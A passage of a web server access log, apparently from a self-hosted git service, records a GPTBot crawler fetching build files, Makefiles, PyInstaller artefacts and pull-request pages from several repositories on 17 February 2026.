+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12027] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=rendered" [Client 74.7.227.38] [Length 12178] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:17:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:17:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 19805] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 12968] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:17:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 21595] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:17:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:17:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60213] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:17:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:17:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:17:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60213] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:17:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:17:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:17:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:17:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:17:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 